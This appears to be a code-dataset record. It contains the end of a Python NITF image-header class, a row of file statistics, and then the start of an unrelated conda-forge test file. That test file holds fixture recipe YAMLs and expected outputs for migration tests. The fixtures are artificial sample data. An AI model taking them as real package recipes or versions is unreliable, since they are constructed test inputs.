and :code:`NC` to represent the image is not compressed. Also valid are
:code:`M1, M3, M4`, and :code:`M5` for compressed images, and :code:`NM`
for uncompressed images indicating an image that contains a block
mask and/or a pad pixel mask. :code:`C6` and :code:`M6` are reserved values
that will represent a future correlated multicomponent compression
algorithm. :code:`C7` and :code:`M7` are reserved values that will represent
a future complex SAR compression. :code:`C8` and :code:`M8` are the values
for ISO standard compression JPEG 2000.
The format of a mask image is identical to the format of its corresponding non-masked image
except for the presence of an Image Data Mask at the beginning of
the image data area. The format of the Image Data Mask is described
in paragraph 5.4.3.2 and is shown in table A-3(A). The definitions
of the compression schemes associated with codes :code:`C1/M1, C3/M3, C4/M4, C5/M5`
are given, respectively, in ITU- T T.4, AMD2, MIL-STD-188-198A,
MIL-STD- 188-199, and NGA N0106-97. :code:`C1` is found in ITU- T T.4 AMD2,
:code:`C3` is found in MIL-STD-188-198A, :code:`C4` is found in MIL-STD-188-199,
and :code:`C5` and :code:`I1` are found in NGA N0106-97. (NOTE: :code:`C2` (ARIDPCM) is not
valid in NITF 2.1.) The definition of the compression scheme associated
with codes :code:`C8/M8` is found in ISO/IEC 15444- 1:2000 (with amendments 1 and 2).
"""
return self._IC
@IC.setter
def IC(self, value):
value = _parse_str(value, 2, 'NC', 'IC', self)
if value not in {
'NC', 'NM', 'C1', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'I1',
'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8'}:
raise ValueError('IC got invalid value {}'.format(value))
self._IC = value
if value in ('NC', 'NM'):
self._COMRAT = None
elif self._COMRAT is not None:
self._COMRAT = '\x20'*4
@property
def COMRAT(self):
"""
None|str: Compression Rate Code. If the IC field contains one of
:code:`C1, C3, C4, C5, C8, M1, M3, M4, M5, M8, I1`, this field shall be contain
a code indicating the compression rate for the image.
If `IC` is :code:`NC` or :code:`NM`, then this will be set to :code:`None`.
"""
return self._COMRAT
@COMRAT.setter
def COMRAT(self, value):
value = _parse_str(value, 4, None, 'COMRAT', self)
if value is None and self.IC not in ('NC', 'NM'):
value = '\x20'*4
logger.error(
'COMRAT value is None, but IC is not in {"NC", "NM"}.\n\t'
'This must be resolved.')
if value is not None and self.IC in ('NC', 'NM'):
value = None
logger.error(
'COMRAT value is something other than None, but IC in {"NC", "NM"}.\n\t'
'This is invalid, and COMRAT is being set to None.')
self._COMRAT = value
@property
def IGEOLO(self):
"""
None|str: Image Geographic Location. This field, when present, shall contain
an approximate geographic location which is not intended for analytical purposes
(e.g., targeting, mensuration, distance calculation); it is intended to support
general user appreciation for the image location (e.g., cataloguing). The
representation of the image corner locations is specified in the `ICORDS` field.
The locations of the four corners of the (significant) image data shall be given
in image coordinate order: (0,0), (0, MaxCol), (MaxRow, MaxCol), (MaxRow, 0).
MaxCol and MaxRow shall be determined from the values contained, respectively,
in the `NCOLS` field and the `NROWS` field.
"""
return self._IGEOLO
@IGEOLO.setter
def IGEOLO(self, value):
value = _parse_str(value, 60, None, 'IGEOLO', self)
if value is None and self.ICORDS.strip() != '':
value = '\x20'*60
if value is not None and self.ICORDS.strip() == '':
value = None
self._IGEOLO = value
@property
def mask_subheader(self):
# type: () -> Union[None, MaskSubheader]
"""
None|MaskSubheader: The mask subheader, if it has been appended.
"""
return self._mask_subheader
@mask_subheader.setter
def mask_subheader(self, value):
if value is None:
self._mask_subheader = None
return
if not isinstance(value, MaskSubheader):
raise ValueError(
'mask_subheader is expected to be an instance of MaskSubheader. '
'Got type {}'.format(type(value)))
if self.IC not in ['NM', 'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8']:
raise ValueError(
'IC={}, which does not indicate the presence of a mask '
'subheader'.format(self.IC))
self._mask_subheader = value
def _get_attribute_length(self, fld):
if fld in ['COMRAT', 'IGEOLO']:
if getattr(self, '_'+fld) is None:
return 0
else:
return self._lengths[fld]
else:
return super(ImageSegmentHeader0, self)._get_attribute_length(fld)
@classmethod
def minimum_length(cls):
# COMRAT and IGEOLO may not be there
return super(ImageSegmentHeader0, cls).minimum_length() - 64
@classmethod
def _parse_attribute(cls, fields, attribute, value, start):
if attribute == 'IC':
val = value[start:start+2].decode('utf-8')
fields['IC'] = val
if val in ('NC', 'NM'):
fields['COMRAT'] = None
out = start+2
elif attribute == 'ICORDS':
fields['ICORDS'] = value[start:start+1]
if fields['ICORDS'] == b'N':
fields['IGEOLO'] = None
out = start+1
else:
out = super(ImageSegmentHeader0, cls)._parse_attribute(fields, attribute, value, start)
return out
| 46.723077 | 120 | 0.590056 | 6,773 | 54,666 | 4.702348 | 0.085634 | 0.015542 | 0.023297 | 0.03099 | 0.826996 | 0.799554 | 0.791642 | 0.779083 | 0.769538 | 0.767654 | 0 | 0.018793 | 0.303059 | 54,666 | 1,169 | 121 | 46.763045 | 0.817161 | 0.148941 | 0 | 0.72267 | 0 | 0.036824 | 0.38467 | 0.00217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06214 | false | 0 | 0.008055 | 0.003452 | 0.254315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0ef6f158195c53eba54fe33351b907d3c9bbc378 | 45,322 | py | Python | tests/test_migrators.py | JorgeGarciaIrazabal/cf-scripts | 69f4f0268496281c2b9e2073e13566b985b06677 | [
"MIT"
] | null | null | null | tests/test_migrators.py | JorgeGarciaIrazabal/cf-scripts | 69f4f0268496281c2b9e2073e13566b985b06677 | [
"MIT"
] | 24 | 2020-11-03T01:33:39.000Z | 2022-01-02T12:34:16.000Z | tests/test_migrators.py | bgruening/cf-scripts | bca57b85be7c9b85a180210f74c90be293519371 | [
"MIT"
] | null | null | null | import os
import builtins
import re
import pytest
import networkx as nx
from conda_forge_tick.contexts import MigratorSessionContext, MigratorContext
from conda_forge_tick.migrators import (
Version,
MigrationYaml,
Replacement,
)
# Legacy THINGS
from conda_forge_tick.migrators.disabled.legacy import (
JS,
Compiler,
Noarch,
Pinning,
NoarchR,
BlasRebuild,
Rebuild,
)
from conda_forge_tick.utils import (
parse_meta_yaml,
frozen_to_json_friendly,
)
from conda_forge_tick.feedstock_parser import populate_feedstock_attributes
from xonsh.lib import subprocess
from xonsh.lib.os import indir
sample_yaml_rebuild = """
{% set version = "1.3.2" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: ac0937d29a3f93cc26737fdf318c09408e9a48adee1648a25d0cdce5647b8eb4
patches:
- gh10591.patch
- relax_gmres_error_check.patch # [aarch64]
- skip_problematic_boost_test.patch # [aarch64 or ppc64le]
- skip_problematic_root_finding.patch # [aarch64 or ppc64le]
- skip_TestIDCTIVFloat_aarch64.patch # [aarch64]
- skip_white_tophat03.patch # [aarch64 or ppc64le]
# remove this patch when updating to 1.3.3
{% if version == "1.3.2" %}
- scipy-1.3.2-bad-tests.patch # [osx and py == 38]
- gh11046.patch # [ppc64le]
{% endif %}
build:
number: 0
skip: true # [win or py2k]
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- liblapack
- python
- setuptools
- cython
- numpy
- pip
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- pytest-xdist
- mpmath
{% if version == "1.3.2" %}
- blas * netlib # [ppc64le]
{% endif %}
about:
home: http://www.scipy.org/
license: BSD-3-Clause
license_file: LICENSE.txt
summary: Scientific Library for Python
description: |
SciPy is a Python-based ecosystem of open-source software for mathematics,
science, and engineering.
doc_url: http://www.scipy.org/docs.html
dev_url: https://github.com/scipy/scipy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- rgommers
- ocefpaf
- beckermr
"""
updated_yaml_rebuild = """
{% set version = "1.3.2" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: ac0937d29a3f93cc26737fdf318c09408e9a48adee1648a25d0cdce5647b8eb4
patches:
- gh10591.patch
- relax_gmres_error_check.patch # [aarch64]
- skip_problematic_boost_test.patch # [aarch64 or ppc64le]
- skip_problematic_root_finding.patch # [aarch64 or ppc64le]
- skip_TestIDCTIVFloat_aarch64.patch # [aarch64]
- skip_white_tophat03.patch # [aarch64 or ppc64le]
# remove this patch when updating to 1.3.3
{% if version == "1.3.2" %}
- scipy-1.3.2-bad-tests.patch # [osx and py == 38]
- gh11046.patch # [ppc64le]
{% endif %}
build:
number: 1
skip: true # [win or py2k]
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- liblapack
- python
- setuptools
- cython
- numpy
- pip
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- pytest-xdist
- mpmath
{% if version == "1.3.2" %}
- blas * netlib # [ppc64le]
{% endif %}
about:
home: http://www.scipy.org/
license: BSD-3-Clause
license_file: LICENSE.txt
summary: Scientific Library for Python
description: |
SciPy is a Python-based ecosystem of open-source software for mathematics,
science, and engineering.
doc_url: http://www.scipy.org/docs.html
dev_url: https://github.com/scipy/scipy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- rgommers
- ocefpaf
- beckermr
"""
updated_yaml_rebuild_no_build_number = """
{% set version = "1.3.2" %}
package:
name: scipy
version: {{ version }}
source:
url: https://github.com/scipy/scipy/archive/v{{ version }}.tar.gz
sha256: ac0937d29a3f93cc26737fdf318c09408e9a48adee1648a25d0cdce5647b8eb4
patches:
- gh10591.patch
- relax_gmres_error_check.patch # [aarch64]
- skip_problematic_boost_test.patch # [aarch64 or ppc64le]
- skip_problematic_root_finding.patch # [aarch64 or ppc64le]
- skip_TestIDCTIVFloat_aarch64.patch # [aarch64]
- skip_white_tophat03.patch # [aarch64 or ppc64le]
# remove this patch when updating to 1.3.3
{% if version == "1.3.2" %}
- scipy-1.3.2-bad-tests.patch # [osx and py == 38]
- gh11046.patch # [ppc64le]
{% endif %}
build:
number: 0
skip: true # [win or py2k]
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- libblas
- libcblas
- liblapack
- python
- setuptools
- cython
- numpy
- pip
run:
- python
- {{ pin_compatible('numpy') }}
test:
requires:
- pytest
- pytest-xdist
- mpmath
{% if version == "1.3.2" %}
- blas * netlib # [ppc64le]
{% endif %}
about:
home: http://www.scipy.org/
license: BSD-3-Clause
license_file: LICENSE.txt
summary: Scientific Library for Python
description: |
SciPy is a Python-based ecosystem of open-source software for mathematics,
science, and engineering.
doc_url: http://www.scipy.org/docs.html
dev_url: https://github.com/scipy/scipy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- rgommers
- ocefpaf
- beckermr
"""
class NoFilter:
def filter(self, attrs, not_bad_str_start=""):
return False
class _MigrationYaml(NoFilter, MigrationYaml):
pass
yaml_rebuild = _MigrationYaml(yaml_contents="hello world", name="hi")
yaml_rebuild.cycles = []
yaml_rebuild_no_build_number = _MigrationYaml(
yaml_contents="hello world",
name="hi",
bump_number=0,
)
yaml_rebuild_no_build_number.cycles = []
def run_test_yaml_migration(
m, *, inp, output, kwargs, prb, mr_out, tmpdir, should_filter=False
):
os.makedirs(os.path.join(tmpdir, "recipe"), exist_ok=True)
with open(os.path.join(tmpdir, "recipe", "meta.yaml"), "w") as f:
f.write(inp)
with indir(tmpdir):
subprocess.run(["git", "init"])
# Load the meta.yaml (this is done in the graph)
try:
pmy = parse_meta_yaml(inp)
except Exception:
pmy = {}
if pmy:
pmy["version"] = pmy["package"]["version"]
pmy["req"] = set()
for k in ["build", "host", "run"]:
pmy["req"] |= set(pmy.get("requirements", {}).get(k, set()))
try:
pmy["meta_yaml"] = parse_meta_yaml(inp)
except Exception:
pmy["meta_yaml"] = {}
pmy["raw_meta_yaml"] = inp
pmy.update(kwargs)
assert m.filter(pmy) is should_filter
if should_filter:
return
mr = m.migrate(os.path.join(tmpdir, "recipe"), pmy)
assert mr_out == mr
pmy.update(PRed=[frozen_to_json_friendly(mr)])
with open(os.path.join(tmpdir, "recipe/meta.yaml")) as f:
actual_output = f.read()
assert actual_output == output
assert os.path.exists(os.path.join(tmpdir, ".ci_support/migrations/hi.yaml"))
with open(os.path.join(tmpdir, ".ci_support/migrations/hi.yaml")) as f:
saved_migration = f.read()
assert saved_migration == m.yaml_contents
def test_yaml_migration_rebuild(tmpdir):
run_test_yaml_migration(
m=yaml_rebuild,
inp=sample_yaml_rebuild,
output=updated_yaml_rebuild,
kwargs={"feedstock_name": "scipy"},
prb="This PR has been triggered in an effort to update **hi**.",
mr_out={
"migrator_name": yaml_rebuild.__class__.__name__,
"migrator_version": yaml_rebuild.migrator_version,
"name": "hi",
"bot_rerun": False,
},
tmpdir=tmpdir,
)
def test_yaml_migration_rebuild_no_buildno(tmpdir):
run_test_yaml_migration(
m=yaml_rebuild_no_build_number,
inp=sample_yaml_rebuild,
output=updated_yaml_rebuild_no_build_number,
kwargs={"feedstock_name": "scipy"},
prb="This PR has been triggered in an effort to update **hi**.",
mr_out={
"migrator_name": yaml_rebuild.__class__.__name__,
"migrator_version": yaml_rebuild.migrator_version,
"name": "hi",
"bot_rerun": False,
},
tmpdir=tmpdir,
)
sample_js = """{% set name = "jstz" %}
{% set version = "1.0.11" %}
{% set sha256 = "985d5fd8705930aab9cc59046e99c1f512d05109c9098039f880df5f5df2bf24" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://github.com/iansinnott/{{ name }}/archive/v{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
noarch: generic
script: npm install -g .
requirements:
build:
- nodejs
test:
commands:
- npm list -g jstz
requires:
- nodejs
about:
home: https://github.com/iansinnott/jstz
license: MIT
license_family: MIT
license_file: LICENCE
summary: 'Timezone detection for JavaScript'
description: |
This library allows you to detect a user's timezone from within their browser.
It is often useful to use JSTZ in combination with a timezone parsing library
such as Moment Timezone.
doc_url: http://pellepim.bitbucket.org/jstz/
dev_url: https://github.com/iansinnott/jstz
extra:
recipe-maintainers:
- cshaley
- sannykr"""
sample_js2 = """{% set name = "jstz" %}
{% set version = "1.0.11" %}
{% set sha256 = "985d5fd8705930aab9cc59046e99c1f512d05109c9098039f880df5f5df2bf24" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://github.com/iansinnott/{{ name }}/archive/v{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
noarch: generic
script: |
tgz=$(npm pack)
npm install -g $tgz
requirements:
build:
- nodejs
test:
commands:
- npm list -g jstz
requires:
- nodejs
about:
home: https://github.com/iansinnott/jstz
license: MIT
license_family: MIT
license_file: LICENCE
summary: 'Timezone detection for JavaScript'
description: |
This library allows you to detect a user's timezone from within their browser.
It is often useful to use JSTZ in combination with a timezone parsing library
such as Moment Timezone.
doc_url: http://pellepim.bitbucket.org/jstz/
dev_url: https://github.com/iansinnott/jstz
extra:
recipe-maintainers:
- cshaley
- sannykr"""
correct_js = """{% set name = "jstz" %}
{% set version = "1.0.11" %}
{% set sha256 = "985d5fd8705930aab9cc59046e99c1f512d05109c9098039f880df5f5df2bf24" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://github.com/iansinnott/{{ name }}/archive/v{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 1
noarch: generic
script: |
tgz=$(npm pack)
npm install -g $tgz
requirements:
build:
- nodejs
test:
commands:
- npm list -g jstz
requires:
- nodejs
about:
home: https://github.com/iansinnott/jstz
license: MIT
license_family: MIT
license_file: LICENCE
summary: 'Timezone detection for JavaScript'
description: |
This library allows you to detect a user's timezone from within their browser.
It is often useful to use JSTZ in combination with a timezone parsing library
such as Moment Timezone.
doc_url: http://pellepim.bitbucket.org/jstz/
dev_url: https://github.com/iansinnott/jstz
extra:
recipe-maintainers:
- cshaley
- sannykr
"""
sample_cb3 = """
{# sample_cb3 #}
{% set version = "1.14.5" %}
{% set build_number = 0 %}
{% set variant = "openblas" %}
{% set build_number = build_number + 200 %}
package:
name: numpy
version: {{ version }}
source:
url: https://github.com/numpy/numpy/releases/download/v{{ version }}/numpy-{{ version }}.tar.gz
sha256: 1b4a02758fb68a65ea986d808867f1d6383219c234aef553a8741818e795b529
build:
number: {{ build_number }}
skip: true # [win32 or (win and py27)]
features:
- blas_{{ variant }}
requirements:
build:
- python
- pip
- cython
- toolchain
- blas 1.1 {{ variant }}
- openblas 0.2.20|0.2.20.*
run:
- python
- blas 1.1 {{ variant }}
- openblas 0.2.20|0.2.20.*
test:
requires:
- nose
commands:
- f2py -h
- conda inspect linkages -p $PREFIX $PKG_NAME # [not win]
- conda inspect objects -p $PREFIX $PKG_NAME # [osx]
imports:
- numpy
- numpy.linalg.lapack_lite
about:
home: http://numpy.scipy.org/
license: BSD 3-Clause
license_file: LICENSE.txt
summary: 'Array processing for numbers, strings, records, and objects.'
doc_url: https://docs.scipy.org/doc/numpy/reference/
dev_url: https://github.com/numpy/numpy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- pelson
- rgommers
- ocefpaf
""" # noqa
correct_cb3 = """
{# correct_cb3 #}
{% set version = "1.14.5" %}
{% set build_number = 1 %}
{% set variant = "openblas" %}
{% set build_number = build_number + 200 %}
package:
name: numpy
version: {{ version }}
source:
url: https://github.com/numpy/numpy/releases/download/v{{ version }}/numpy-{{ version }}.tar.gz
sha256: 1b4a02758fb68a65ea986d808867f1d6383219c234aef553a8741818e795b529
build:
number: {{ build_number }}
skip: true # [win32 or (win and py27)]
features:
- blas_{{ variant }}
requirements:
build:
- {{ compiler('fortran') }}
- {{ compiler('c') }}
- {{ compiler('cxx') }}
host:
- python
- pip
- cython
- blas 1.1 {{ variant }}
- openblas
run:
- python
- blas 1.1 {{ variant }}
- openblas
test:
requires:
- nose
commands:
- f2py -h
- conda inspect linkages -p $PREFIX $PKG_NAME # [not win]
- conda inspect objects -p $PREFIX $PKG_NAME # [osx]
imports:
- numpy
- numpy.linalg.lapack_lite
about:
home: http://numpy.scipy.org/
license: BSD 3-Clause
license_file: LICENSE.txt
summary: 'Array processing for numbers, strings, records, and objects.'
doc_url: https://docs.scipy.org/doc/numpy/reference/
dev_url: https://github.com/numpy/numpy
extra:
recipe-maintainers:
- jakirkham
- msarahan
- pelson
- rgommers
- ocefpaf
""" # noqa
sample_r_base = """
{# sample_r_base #}
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
updated_r_base = """
{# updated_r_base #}
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
noarch: generic
number: 2
rpaths:
- lib/R/lib/
- lib/
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
sample_r_base2 = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
updated_r_base2 = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 2
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
""" # noqa
# Test that filepaths to various licenses are updated for a noarch recipe
sample_r_licenses_noarch = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\GPL-3' # [win]
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\MIT' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2.1' # [win]
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\BSD_3_clause' # [win]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
""" # noqa
updated_r_licenses_noarch = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
noarch: generic
number: 2
rpaths:
- lib/R/lib/
- lib/
requirements:
build:
- r-base
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3'
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1'
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
""" # noqa
# Test that filepaths to various licenses are updated for a compiled recipe
sample_r_licenses_compiled = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 1
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\GPL-3' # [win]
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\MIT' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2' # [win]
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\LGPL-2.1' # [win]
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
license_file: '{{ environ["PREFIX"] }}\\R\\share\\licenses\\BSD_3_clause' # [win]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2' # [unix]
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause' # [unix]
""" # noqa
updated_r_licenses_compiled = """
{% set version = '0.7-1' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-stabledist
version: {{ version|replace("-", "_") }}
source:
fn: stabledist_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/stabledist_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/stabledist/stabledist_{{ version }}.tar.gz
sha256: 06c5704d3a3c179fa389675c537c39a006867bc6e4f23dd7e406476ed2c88a69
build:
number: 2
rpaths:
- lib/R/lib/
- lib/
skip: True # [win32]
requirements:
build:
- r-base
- {{ compiler('c') }}
run:
- r-base
test:
commands:
- $R -e "library('stabledist')" # [not win]
- "\\"%R%\\" -e \\"library('stabledist')\\"" # [win]
about:
license_family: GPL3
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-3'
license_family: MIT
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/MIT'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2'
license_family: LGPL
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/LGPL-2.1'
license_family: BSD
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/GPL-2'
license_file: '{{ environ["PREFIX"] }}/lib/R/share/licenses/BSD_3_clause'
""" # noqa
sample_noarch = """
{# sample_noarch #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
fn: {{ name }}-{{ version }}.tar.gz
url: https://github.com/xpdAcq/{{ name }}/releases/download/{{ version }}/{{ version }}.tar.gz
sha256: {{ sha256 }}
build:
number: 0
script: python -m pip install --no-deps --ignore-installed .
requirements:
build:
- python >=3
- pip
run:
- python >=3
- numpy
- scipy
- matplotlib
- pyyaml
- scikit-beam
- pyfai
- pyxdameraulevenshtein
- xray-vision
- databroker
- bluesky
- streamz_ext
- xpdsim
- shed
- xpdview
- ophyd
- xpdconf
test:
imports:
- xpdan
- xpdan.pipelines
about:
home: http://github.com/xpdAcq/xpdAn
license: BSD-3-Clause
license_family: BSD
license_file: LICENSE
summary: 'Analysis Tools for XPD'
doc_url: http://xpdacq.github.io/xpdAn/
dev_url: http://github.com/xpdAcq/xpdAn
extra:
recipe-maintainers:
- CJ-Wright
""" # noqa
updated_noarch = """
{# updated_noarch #}
{% set name = "xpdan" %}
{% set version = "0.3.3" %}
{% set sha256 = "3f1a84f35471aa8e383da3cf4436492d0428da8ff5b02e11074ff65d400dd076" %}
package:
name: {{ name|lower }}
